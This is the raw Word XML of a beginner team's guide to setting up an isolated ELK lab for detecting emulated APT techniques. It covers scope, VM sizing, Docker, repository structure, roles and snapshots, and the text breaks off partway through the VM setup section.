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EDF1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STEP 1 — Design &amp; Preparation (Architecture, Scope, Lab, Safety, Team Roles)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D6EB87" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">This first step gets your project correctly planned and your lab / infrastructure prepared so every later step is fast and safe. Do </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA611A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> skip any sub-item — doing this well saves many hours later.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40165DA1" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00000000" w:rsidP="00DA611A">
      <w:r>
        <w:pict w14:anchorId="5B10589D">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3512BD2F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1.1 What this step achieves (summary)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF089CB" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Decide scope (which logs, which APT techniques to emulate).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E302CA" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Prepare a safe isolated lab environment (VMs / network / test hosts).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EEFB9D" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Choose infrastructure (Docker vs VMs vs cloud).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56379604" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Create project repo, credentials, and a basic architecture diagram.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D830B72" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Assign team roles &amp; deliverables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175ACEC9" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Collect required accounts and API keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BBBB9B" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Understand safety/legal constraints (don’t run attack tests on production).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A18E0D4" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00000000" w:rsidP="00DA611A">
      <w:r>
        <w:pict w14:anchorId="1D2458BA">
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="577615B5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1.2 Why this step is important</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682BA1C9" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>ELK and attack simulation need careful environment choices (resource sizing, isolation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEA7E79" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Running APT emulations on production can crash systems / break policies — an isolated lab removes this risk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B02DBB8" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Clear roles and a diagram let 6 beginners work in parallel with minimal conflict.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B4141C" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00000000" w:rsidP="00DA611A">
      <w:r>
        <w:pict w14:anchorId="166C9B4F">
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1274502A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1.3 Checklist — items to complete in this step</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13341482" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">(Complete every line; mark </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA611A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
        </w:rPr>
        <w:t>✓</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> as you finish.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50036A03" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Create a new GitHub repo for the project.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E06C411" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Choose project host: local laptop(s) + VMs OR cloud (AWS/Google/Azure) — decide now.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549C84E2" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Prepare at least 3 virtual machines for testing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A2C199" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>VM-A: ELK stack node (can be one VM for dev POC).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E9C8D8" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>VM-B: Windows test host (for Windows Event logs &amp; PowerShell tests).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CB047F" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>VM-C: Linux test host (for Linux syslog, SSH lateral movement tests).</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA611A">
        <w:br/>
        <w:t>Optionally: VM-D as attacker machine (Kali) and a Suricata/Zeek sensor VM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7869E9" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Confirm hardware: each VM with at least 2 vCPU, 4–8 GB RAM; ELK host preferably 8+ GB RAM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2583C718" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">Decide Docker or native install for ELK; </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA611A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>for beginners use Docker Compose</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA611A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B79A714" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">Set host kernel setting </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>vm.max_map_count</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>=262144 (required for Elasticsearch).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150B8F6C" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:lastRenderedPageBreak/>
        <w:t>Create a Google Drive / shared folder for docs, screenshots, and exported rules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7789DDF3" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Create an architecture diagram (simple box-and-arrow) and post to repo README.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F14AA8F" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Assign team roles (Infra, Beats, Logstash, Rules, Attack-sim, Dashboard, Demo).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E036BF" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Download Atomic Red Team technique list and pick 6 techniques to emulate (e.g., PowerShell download, credential dumping, lateral movement, file transfer).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A10E88" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Prepare safety notice &amp; runbook: how to stop tests &amp; revert VMs (snapshots).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B76CBF" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Ensure one team member is responsible for backups &amp; snapshots (create VM snapshots now).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D3A03F" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Create an issues / tasks board (GitHub Issues, Trello, or similar).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB767F4" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00000000" w:rsidP="00DA611A">
      <w:r>
        <w:pict w14:anchorId="5F8EE0F7">
          <v:rect id="_x0000_i1028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="561BD807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1.4 Detailed actions &amp; commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053B5CF6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A. Create the project repo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516A09BB" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">Go to </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00DA611A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> and create a repository (e.g., elk-apt-detection).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0425E5" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Add a README.md describing purpose and a short architecture ASCII diagram (we’ll fill later).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762EAFA9" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Create these top-level folders in the repo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7815CEC4" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>docs</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="77AA3674" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>docker</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="57F7E6B7" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>logstash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>/pipelines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5AEDF2" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>/beats/configs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2767333C" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>/rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2541DD" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>/dashboards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595C968C" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>/atomic-tests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50085BD7" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Commit an initial README and push.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB81EEB" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Links</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11871915" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">GitHub: </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00DA611A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/new</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="06D9E9EA" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00000000" w:rsidP="00DA611A">
      <w:r>
        <w:pict w14:anchorId="07595793">
          <v:rect id="_x0000_i1029" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="70EF5AB8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B. Decide infrastructure (local vs cloud)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29784533" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Option (A) — Local / VM-based (recommended for beginners):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06036EDA" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Use VirtualBox + Vagrant or VMware Workstation / Player.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC052F2" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Benefits: full control; no cloud costs; easy snapshots.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093AFF22" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Requirements: a host PC with ~16 GB RAM recommended to run multiple VMs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375A8070" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Option (B) — Cloud (AWS/GCP/Azure):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FE0E4C" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Use small instances (t2.medium / e2-medium) but ELK benefits from more RAM. Cloud works if you have credits but requires careful security (open ports).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7749A3" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>If cloud, restrict access by IP and enable firewall rules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6150A564" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Links</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE5C97D" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>VirtualBox: https://www.virtualbox.org/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236FAA49" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Vagrant (optional): https://www.vagrantup.com/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE47F53" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00000000" w:rsidP="00DA611A">
      <w:r>
        <w:pict w14:anchorId="09814ED7">
          <v:rect id="_x0000_i1030" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F54D99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C. Create test VMs &amp; snapshots (isolation &amp; rollback)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAEB423" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> If a test goes wrong, you can revert to snapshot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B41561D" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>VirtualBox example (manually):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4491879A" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Create VM for ELK: Ubuntu 22.04 LTS, 8 GB RAM, 50+ GB disk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0BFC88" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">Create VM for Windows: Windows 10/11 VM (for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Winlogbeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE3C23A" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
